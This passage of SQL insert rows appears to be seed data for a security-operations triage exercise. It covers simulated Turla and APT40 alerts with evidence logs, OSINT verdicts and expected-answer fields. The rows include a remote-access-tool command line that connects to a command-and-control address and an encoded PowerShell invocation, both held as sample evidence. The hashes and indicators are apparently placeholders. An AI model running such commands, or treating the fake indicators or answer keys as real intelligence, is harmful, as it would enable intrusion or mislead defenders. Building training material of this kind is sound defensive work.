1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":1102,\\\"log_name\\\":\\\"Security\\\",\\\"source\\\":\\\"Microsoft-Windows-Eventlog\\\",\\\"task_category\\\":\\\"Log Clear\\\",\\\"level\\\":\\\"Information\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"name\\\":\\\"hacker_user\\\"},\\\"computer\\\":\\\"compromised-host.local\\\",\\\"description\\\":\\\"The audit log was cleared.\\\",\\\"ip_address\\\":\\\"192.168.1.45\\\",\\\"malicious_ip\\\":\\\"203.0.113.5\\\",\\\"deleted_files\\\":[\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"C:\\\\\\\\Temp\\\\\\\\malware.exe\\\"],\\\"hash\\\":\\\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(347, 'Initial Access via Spear Phishing', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting a diplomatic network. The email contained a malicious attachment believed to be linked with the Turla APT group. The email was sent from a known malicious IP address and contained a weaponized document aimed at exploiting vulnerabilities to gain an initial foothold.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:32:00Z\",\"email_id\":\"345abc678def901234ghi567\",\"sender\":\"malicious.actor@example.com\",\"recipient\":\"john.doe@diplomat.org\",\"subject\":\"Urgent: Diplomatic Meeting Itinerary\",\"attachment\":\"Meeting_Agenda.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_family\":\"CobraDoc\",\"detection\":{\"rule_id\":\"PHISH-001\",\"rule_name\":\"Spear Phishing with Malicious Attachment\",\"confidence\":\"High\"}}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious.actor@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Known phishing email sender associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Turla APT infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Turla weaponized document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Meeting_Agenda.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in spear phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing\",\"date\":\"2026-02-01T20:32:18.942Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(348, 'Execution of Remote Access Tool', 'high', 'Endpoint Detection and Response', 'With initial access secured, Turla deploys a remote access tool to execute commands and further their control over the infected endpoint. Anomalous execution detected on endpoint with associated malicious artifacts.', 'Malware Execution', 'T1219 - Remote Access Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"E12345\",\"event_type\":\"malware_execution\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.45.67.89\",\"username\":\"jdoe\",\"process_name\":\"rat_tool.exe\",\"process_hash\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe -connect 185.45.67.89\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe\",\"indicator\":\"Turla RAT\",\"device_id\":\"DESKTOP-ABCD1234\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.45.67.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known Turla command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"rat_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Turla RAT\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(349, 'Rootkit Deployment for Persistence', 'high', 'System Event Logs', 'To ensure continued access, Turla installs a sophisticated rootkit that embeds itself deeply within the system, evading detection and enabling persistent control.', 'Persistence Mechanism', 'T1014', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"7045\",\"event_source\":\"Service Control Manager\",\"computer_name\":\"compromised-host.local\",\"user\":\"SYSTEM\",\"service_name\":\"turla_rootkit\",\"service_file_name\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\trkl.sys\",\"service_type\":\"Kernel Driver\",\"service_start_type\":\"Auto\",\"service_account\":\"LocalSystem\",\"network_activity\":{\"external_ip\":\"185.92.220.23\",\"internal_ip\":\"192.168.1.105\",\"protocol\":\"TCP\",\"port\":443},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Turla C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host internal IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious rootkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.944Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"7045\\\",\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"service_name\\\":\\\"turla_rootkit\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\trkl.sys\\\",\\\"service_type\\\":\\\"Kernel Driver\\\",\\\"service_start_type\\\":\\\"Auto\\\",\\\"service_account\\\":\\\"LocalSystem\\\",\\\"network_activity\\\":{\\\"external_ip\\\":\\\"185.92.220.23\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":443},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(350, 'Lateral Movement via Hijacked Credentials', 'high', 'Network Traffic Analysis', 'Anomalous lateral movement detected involving the use of hijacked credentials to access multiple internal systems. The activity is linked to the Turla group, known for its lateral techniques to extend network control.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"192.168.1.15\",\"protocol\":\"RDP\",\"username\":\"jdoe\",\"action\":\"Successful login\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"turla_tool.exe\",\"event_id\":\"4624\",\"description\":\"Successful logon using RDP with hijacked credentials\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Scan\",\"verdict\":\"internal\",\"details\":\"Internal corporate server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Turla tool\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"turla_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with Turla APT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(351, 'Exfiltration Through Satellite Link Hijacking', 'high', 'Satellite Communication Logs', 'In a final maneuver, Turla uses hijacked satellite internet links to stealthily exfiltrate sensitive data, masking the C2 traffic and evading traditional network defenses.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:16Z\",\"source_ip\":\"10.0.1.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"sensitive_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"data_exfiltration\",\"protocol\":\"satellite_link\",\"malware\":\"Turla\"}', '2026-01-03 00:37:55', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Turla group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Contains potentially sensitive information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(352, 'Suspicious Access to University Network', 'high', 'Firewall logs', 'APT40 exploited a known vulnerability in the university\'s web server software, gaining initial access to the network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:22:10Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"dst_port\":443,\"method\":\"GET\",\"url\":\"/vulnerable_endpoint\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\"http_version\":\"HTTP/1.1\",\"status_code\":200,\"response_size\":5120,\"referer\":\"http://malicious.example.com\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"exploit_payload.bin\",\"action\":\"allowed\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"University web server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"APT40 exploit payload used in multiple attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Investigation\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file name discovered during analysis.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, 